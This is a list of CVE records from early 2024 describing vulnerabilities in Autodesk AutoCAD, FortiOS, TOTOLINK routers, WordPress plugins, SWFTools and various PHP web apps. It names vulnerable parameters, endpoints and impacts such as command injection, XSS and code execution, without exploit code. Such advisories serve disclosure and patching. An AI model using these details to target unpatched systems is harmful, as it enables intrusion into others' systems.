CVE 2024 2316 Candidate A vulnerability has been found in Bdtask Hospital AutoManager up to 20240227 and classified as problematic. This vulnerability affects unknown code of the file /billing/bill/edit/ of the component Update Bill Page. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256270 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256270 | Bdtask Hospital AutoManager Update Bill Page cross-site request forgery | URL:https://vuldb.com/?id.256270 | MISC:VDB-256270 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.256270 | MISC:https://drive.google.com/file/d/1v_Ee2FWlbpLgHYIl88COPp05EHSxUWI0/view?usp=sharing | URL:https://drive.google.com/file/d/1v_Ee2FWlbpLgHYIl88COPp05EHSxUWI0/view?usp=sharing Assigned (20240308)
CVE 2024 2314 Candidate If kernel headers need to be extracted, bcc will attempt to load them from a temporary directory. An unprivileged attacker could use this to force bcc to load compromised linux headers. Linux distributions which provide kernel headers by default are not affected by default. MISC:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2314 | URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2314 | MISC:https://github.com/iovisor/bcc/commit/008ea09e891194c072f2a9305a3c872a241dc342 | URL:https://github.com/iovisor/bcc/commit/008ea09e891194c072f2a9305a3c872a241dc342 Assigned (20240307)
CVE 2024 23139 Candidate An Out-Of-Bounds Write Vulnerability in Autodesk FBX Review version 1.5.3.0 and prior may lead to code execution or information disclosure through maliciously crafted ActionScript Byte Code “ABC” files. ABC files are created by the Flash compiler and contain executable code. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0005 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0005 Assigned (20240111)
CVE 2024 23138 Candidate A maliciously crafted DWG file when parsed through Autodesk DWG TrueView can be used to cause a Stack-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0006 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0006 Assigned (20240111)
CVE 2024 23137 Candidate A maliciously crafted STP or SLDPRT file in ODXSW_DLL.dll when parsed through Autodesk AutoCAD can be used to uninitialized variable. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23136 Candidate A maliciously crafted STP file in ASMKERN228A.dll when parsed through Autodesk AutoCAD can be used to dereference an untrusted pointer. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23135 Candidate A maliciously crafted SLDPRT file in ASMkern228A.dll when parsed through Autodesk AutoCAD can be used in user-after-free vulnerability. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23134 Candidate A maliciously crafted IGS file in tbb.dll when parsed through Autodesk AutoCAD can be used in user-after-free vulnerability. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23133 Candidate A maliciously crafted STP file in ASMDATAX228A.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23132 Candidate A maliciously crafted STP file in atf_dwg_consumer.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23131 Candidate A maliciously crafted STP file in ASMKERN228A.dll or ASMDATAX228A.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23130 Candidate A maliciously crafted SLDASM, or SLDPRT files in ODXSW_DLL.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 2313 Candidate If kernel headers need to be extracted, bpftrace will attempt to load them from a temporary directory. An unprivileged attacker could use this to force bcc to load compromised linux headers. Linux distributions which provide kernel headers by default are not affected by default. MISC:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2313 | URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2313 | MISC:https://github.com/bpftrace/bpftrace/commit/4be4b7191acb8218240e6b7178c30fa8c9b59998 | URL:https://github.com/bpftrace/bpftrace/commit/4be4b7191acb8218240e6b7178c30fa8c9b59998 Assigned (20240307)
CVE 2024 23129 Candidate A maliciously crafted MODEL 3DM, STP or SLDASM files in opennurbs.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23128 Candidate A maliciously crafted MODEL file in libodxdll.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23127 Candidate A maliciously crafted MODEL, SLDPRT or SLDASM file in VCRUNTIME140.dll when parsed through Autodesk AutoCAD can be used to cause a Heap-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23126 Candidate A maliciously crafted CATPART file in CC5Dll.dll when parsed through Autodesk AutoCAD can be used to cause a Stack-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23125 Candidate A maliciously crafted SLDPRT file when parsed ODXSW_DLL.dll through Autodesk AutoCAD can be used to cause a Stack-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 Assigned (20240111)
CVE 2024 23124 Candidate A maliciously crafted STP file in ASMIMPORT228A.dll when parsed through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23123 Candidate A maliciously crafted CATPART file in CC5Dll.dll or ASMBASE228A.dll when parsed through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23122 Candidate A maliciously crafted 3DM file in opennurbs.dll when parsed through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23121 Candidate A maliciously crafted MODEL file in libodxdll.dll when parsed through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the current process. MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002 | MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 | URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004 Assigned (20240111)
CVE 2024 23114 Candidate Deserialization of Untrusted Data vulnerability in Apache Camel CassandraQL Component AggregationRepository which is vulnerable to unsafe deserialization. Under specific conditions it is possible to deserialize malicious payload.This issue affects Apache Camel: from 3.0.0 before 3.21.4, from 3.22.0 before 3.22.1, from 4.0.0 before 4.0.4, from 4.1.0 before 4.4.0. Users are recommended to upgrade to version 4.4.0, which fixes the issue. If users are on the 4.0.x LTS releases stream, then they are suggested to upgrade to 4.0.4. If users are on 3.x, they are suggested to move to 3.21.4 or 3.22.1 MISC:https://camel.apache.org/security/CVE-2024-23114.html | URL:https://camel.apache.org/security/CVE-2024-23114.html Assigned (20240111)
CVE 2024 23113 Candidate A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, FortiPAM versions 1.2.0, 1.1.0 through 1.1.2, 1.0.0 through 1.0.3, FortiSwitchManager versions 7.2.0 through 7.2.3, 7.0.0 through 7.0.3 allows attacker to execute unauthorized code or commands via specially crafted packets. MISC:https://fortiguard.com/psirt/FG-IR-24-029 | URL:https://fortiguard.com/psirt/FG-IR-24-029 Assigned (20240111)
CVE 2024 23112 Candidate An authorization bypass through user-controlled key vulnerability [CWE-639] in FortiOS version 7.4.0 through 7.4.1, 7.2.0 through 7.2.6, 7.0.1 through 7.0.13, 6.4.7 through 6.4.14, and FortiProxy version 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14 SSL-VPN may allow an authenticated attacker to gain access to another user’s bookmark via URL manipulation. MISC:https://fortiguard.com/psirt/FG-IR-24-013 | URL:https://fortiguard.com/psirt/FG-IR-24-013 Assigned (20240111)
CVE 2024 23109 Candidate An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests. MISC:https://fortiguard.com/psirt/FG-IR-23-130 | URL:https://fortiguard.com/psirt/FG-IR-23-130 Assigned (20240111)
CVE 2024 23094 Candidate Flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /cover/addons/info_media_gallery/action/edit_addon_post.php MISC:https://github.com/TinkAnet/cve/blob/main/csrf3.md Assigned (20240111)
CVE 2024 2308 Candidate The ElementInvader Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button link in the EliSlider in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050556%40elementinvader-addons-for-elementor&new=3050556%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050556%40elementinvader-addons-for-elementor&new=3050556%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/40a272dc-cb2a-472f-be42-733efcb2fa61?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/40a272dc-cb2a-472f-be42-733efcb2fa61?source=cve Assigned (20240307)
CVE 2024 2307 Candidate A flaw was found in osbuild-composer. A condition can be triggered that disables GPG verification for package repositories, which can expose the build phase to a Man-in-the-Middle attack, allowing untrusted code to be installed into an image being built. MISC:RHBZ#2268513 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2268513 | MISC:https://access.redhat.com/security/cve/CVE-2024-2307 | URL:https://access.redhat.com/security/cve/CVE-2024-2307 Assigned (20240307)
CVE 2024 23061 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the minute parameter in the setScheduleCfg function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/3/TOTOLINK%20A3300R%20setScheduleCfg.md Assigned (20240111)
CVE 2024 23060 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the ip parameter in the setDmzCfg function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/4/TOTOLINK%20A3300R%20setDmzCfg.md Assigned (20240111)
CVE 2024 23059 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the username parameter in the setDdnsCfg function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/2/TOTOlink%20A3300R%20setDdnsCfg.md Assigned (20240111)
CVE 2024 23058 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the pass parameter in the setTr069Cfg function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/6/TOTOlink%20A3300R%20setTr069Cfg.md Assigned (20240111)
CVE 2024 23057 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the tz parameter in the setNtpCfg function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/5/TOTOlink%20A3300R%20setNtpCfg.md Assigned (20240111)
CVE 2024 23055 Candidate An issue in Plone Docker Official Image 5.2.13 (5221) open-source software allows for remote code execution via improper validation of input by the HOST headers. MISC:http://plone.com | MISC:http://ploneorg.com | MISC:https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-23055 Assigned (20240111)
CVE 2024 23054 Candidate An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution due to a package listed in ++plone++static/components not existing in the public package index (npm). MISC:http://plone.com | MISC:http://ploneorg.com | MISC:https://github.com/c0d3x27/CVEs/blob/main/CVE-2024-23054/README.md Assigned (20240111)
CVE 2024 23052 Candidate An issue in WuKongOpenSource WukongCRM v.72crm_9.0.1_20191202 allows a remote attacker to execute arbitrary code via the parseObject() function in the fastjson component. MISC:https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/WukongCRM_9.0.md#1remote-code-execution-vulnerability | MISC:https://github.com/WuKongOpenSource/WukongCRM-9.0-JAVA/issues/28 Assigned (20240111)
CVE 2024 23049 Candidate An issue in symphony v.3.6.3 and before allows a remote attacker to execute arbitrary code via the log4j component. MISC:https://github.com/88250/symphony/issues/82 Assigned (20240111)
CVE 2024 2304 Candidate The Animated Headline plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'animated-headline' shortcode in all versions up to, and including, 4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://wordpress.org/plugins/animated-headline/ | URL:https://wordpress.org/plugins/animated-headline/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6f589b5d-9cdb-4521-bc60-c8f19d0ef982?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6f589b5d-9cdb-4521-bc60-c8f19d0ef982?source=cve Assigned (20240307)
CVE 2024 23034 Candidate Cross Site Scripting vulnerability in the input parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL. MISC:https://github.com/weng-xianhu/eyoucms/issues/57 Assigned (20240111)
CVE 2024 23033 Candidate Cross Site Scripting vulnerability in the path parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL. MISC:https://github.com/weng-xianhu/eyoucms/issues/57 Assigned (20240111)
CVE 2024 23032 Candidate Cross Site Scripting vulnerability in num parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL. MISC:https://github.com/weng-xianhu/eyoucms/issues/57 Assigned (20240111)
CVE 2024 23031 Candidate Cross Site Scripting (XSS) vulnerability in is_water parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL. MISC:https://github.com/weng-xianhu/eyoucms/issues/57 Assigned (20240111)
CVE 2024 2303 Candidate The Easy Textillate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'textillate' shortcode in all versions up to, and including, 2.01 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050231%40easy-textillate&new=3050231%40easy-textillate&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050231%40easy-textillate&new=3050231%40easy-textillate&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/66529116-7b0e-4e2f-96f1-a4d91fa7f956?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/66529116-7b0e-4e2f-96f1-a4d91fa7f956?source=cve Assigned (20240307)
CVE 2024 22988 Candidate An issue in zkteco zkbio WDMS v.8.0.5 allows an attacker to execute arbitrary code via the /files/backup/ component. MISC:https://gist.github.com/whiteman007/b50a9b64007a5d7bcb7a8bee61d2cb47 | MISC:https://www.vicarius.io/vsociety/posts/revealing-cve-2024-22988-a-unique-dive-into-exploiting-access-control-gaps-in-zkbio-wdms-uncover-the-untold-crafted-for-beginners-with-a-rare-glimpse-into-pentesting-strategies | MISC:https://zkteco.com Assigned (20240111)
CVE 2024 22984 Candidate ** REJECT ** DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. Assigned (20240111)
CVE 2024 22983 Candidate SQL injection vulnerability in Projectworlds Visitor Management System in PHP v.1.0 allows a remote attacker to escalate privileges via the name parameter in the myform.php endpoint. MISC:http://projectworlds.com | MISC:http://visitor.com | MISC:https://github.com/keru6k/CVE-2024-22983/blob/main/CVE-2024-22983.md Assigned (20240111)
CVE 2024 2298 Candidate The affiliate-toolkit – WordPress Affiliate Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the atkp_import_product() function in all versions up to, and including, 3.5.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to to perform unauthorized actions such as creating importing products. MISC:https://plugins.trac.wordpress.org/changeset/3045821/affiliate-toolkit-starter/trunk/includes/atkp_endpoints.php | URL:https://plugins.trac.wordpress.org/changeset/3045821/affiliate-toolkit-starter/trunk/includes/atkp_endpoints.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4d4d0176-3b7d-4de5-95ec-365873e6f13b?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4d4d0176-3b7d-4de5-95ec-365873e6f13b?source=cve Assigned (20240307)
CVE 2024 22957 Candidate swftools 0.9.2 was discovered to contain an Out-of-bounds Read vulnerability via the function dict_do_lookup in swftools/lib/q.c:1190. MISC:https://github.com/matthiaskramm/swftools/issues/206 Assigned (20240111)
CVE 2024 22956 Candidate swftools 0.9.2 was discovered to contain a heap-use-after-free vulnerability via the function removeFromTo at swftools/src/swfc.c:838 MISC:https://github.com/matthiaskramm/swftools/issues/208 Assigned (20240111)
CVE 2024 22955 Candidate swftools 0.9.2 was discovered to contain a stack-buffer-underflow vulnerability via the function parseExpression at swftools/src/swfc.c:2576. MISC:https://github.com/matthiaskramm/swftools/issues/207 Assigned (20240111)
CVE 2024 22942 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the hostName parameter in the setWanCfg function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/1/TOTOlink%20A3300R%20setWanCfg.md Assigned (20240111)
CVE 2024 2294 Candidate The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.7 via the backup_name parameter in the backuply_download_backup function. This makes it possible for attackers to have an account with only activate_plugins capability to access arbitrary files on the server, which can contain sensitive information. This only impacts sites hosted on Windows servers. MISC:https://plugins.trac.wordpress.org/browser/backuply/trunk/functions.php#L1615 | URL:https://plugins.trac.wordpress.org/browser/backuply/trunk/functions.php#L1615 | MISC:https://plugins.trac.wordpress.org/browser/backuply/trunk/main/ajax.php#L78 | URL:https://plugins.trac.wordpress.org/browser/backuply/trunk/main/ajax.php#L78 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050547%40backuply&new=3050547%40backuply&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050547%40backuply&new=3050547%40backuply&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/be3bd1f2-092c-47c4-a4e4-3365e107c57f?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/be3bd1f2-092c-47c4-a4e4-3365e107c57f?source=cve Assigned (20240307)
CVE 2024 22939 Candidate Cross Site Request Forgery vulnerability in FlyCms v.1.0 allows a remote attacker to execute arbitrary code via the system/article/category_edit component. MISC:https://github.com/NUDTTAN91/CVE-2024-22939 | MISC:https://github.com/NUDTTAN91/CVE20240109/blob/master/README.md Assigned (20240111)
CVE 2024 22938 Candidate Insecure Permissions vulnerability in BossCMS v.1.3.0 allows a local attacker to execute arbitrary code and escalate privileges via the init function in admin.class.php component. MISC:https://github.com/n0Sleeper/bosscmsVuln | MISC:https://github.com/n0Sleeper/bosscmsVuln/issues/1 | MISC:https://www.bosscms.net/ Assigned (20240111)
CVE 2024 22936 Candidate Cross-site scripting (XSS) vulnerability in Parents & Student Portal in Genesis School Management Systems in Genesis AIMS Student Information Systems v.3053 allows remote attackers to inject arbitrary web script or HTML via the message parameter. MISC:https://github.com/SnoopJesus420/CVEs/blob/main/CVE-2023- | MISC:https://github.com/SnoopJesus420/CVEs/blob/main/CVEs-2024/CVE-2024-22936.md Assigned (20240111)
CVE 2024 2293 Candidate The Site Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user display name in all versions up to, and including, 6.11.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/site-reviews/trunk/views/partials/listtable/filter.php#L5 | URL:https://plugins.trac.wordpress.org/browser/site-reviews/trunk/views/partials/listtable/filter.php#L5 | MISC:https://plugins.trac.wordpress.org/changeset?old_path=/site-reviews/tags/6.11.4&old=3049214&new_path=/site-reviews/tags/6.11.7&new=3049214&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=/site-reviews/tags/6.11.4&old=3049214&new_path=/site-reviews/tags/6.11.7&new=3049214&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/823418d9-a231-4306-8575-2937a491509f?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/823418d9-a231-4306-8575-2937a491509f?source=cve Assigned (20240307)
CVE 2024 22927 Candidate Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL. MISC:https://github.com/weng-xianhu/eyoucms/issues/57 Assigned (20240111)
CVE 2024 22923 Candidate SQL injection vulnerability in adv radius v.2.2.5 allows a local attacker to execute arbitrary code via a crafted script. MISC:http://advradius.com/demo/ | MISC:https://gist.github.com/whiteman007/ Assigned (20240111)
CVE 2024 22922 Candidate An issue in Projectworlds Vistor Management Systemin PHP v.1.0 allows a remtoe attacker to escalate privileges via a crafted script to the login page in the POST/index.php MISC:http://projectworlds.com | MISC:http://visitor.com | MISC:https://github.com/keru6k/CVE-2024-22922/blob/main/CVE-2024-22922.md Assigned (20240111)
CVE 2024 22920 Candidate swftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c. MISC:https://github.com/matthiaskramm/swftools/issues/211 Assigned (20240111)
CVE 2024 22919 Candidate swftools0.9.2 was discovered to contain a global-buffer-overflow vulnerability via the function parseExpression at swftools/src/swfc.c:2587. MISC:https://github.com/matthiaskramm/swftools/issues/209 Assigned (20240111)
CVE 2024 22917 Candidate SQL injection vulnerability in Dynamic Lab Management System Project in PHP v.1.0 allows a remote attacker to execute arbitrary code via a crafted script. MISC:https://github.com/ASR511-OO7/CVE-2024-22917/blob/main/CVE-22 Assigned (20240111)
CVE 2024 22916 Candidate In D-LINK Go-RT-AC750 v101b03, the sprintf function in the sub_40E700 function within the cgibin is susceptible to stack overflow. MISC:https://kee02p.github.io/2024/01/13/CVE-2024-22916/ | MISC:https://www.dlink.com/en/security-bulletin/ Assigned (20240111)
CVE 2024 22915 Candidate A heap-use-after-free was found in SWFTools v0.9.2, in the function swf_DeleteTag at rfxswf.c:1193. It allows an attacker to cause code execution. MISC:https://github.com/matthiaskramm/swftools/issues/215 Assigned (20240111)
CVE 2024 22914 Candidate A heap-use-after-free was found in SWFTools v0.9.2, in the function input at lex.swf5.c:2620. It allows an attacker to cause denial of service. MISC:https://github.com/matthiaskramm/swftools/issues/214 Assigned (20240111)
CVE 2024 22913 Candidate A heap-buffer-overflow was found in SWFTools v0.9.2, in the function swf5lex at lex.swf5.c:1321. It allows an attacker to cause code execution. MISC:https://github.com/matthiaskramm/swftools/issues/213 Assigned (20240111)
CVE 2024 22912 Candidate A global-buffer-overflow was found in SWFTools v0.9.2, in the function countline at swf5compiler.flex:327. It allows an attacker to cause code execution. MISC:https://github.com/matthiaskramm/swftools/issues/212 Assigned (20240111)
